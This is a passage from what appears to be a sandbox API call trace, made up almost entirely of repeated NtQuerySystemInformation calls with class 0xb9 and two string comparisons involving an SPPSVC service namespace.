ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.899] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.909] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, 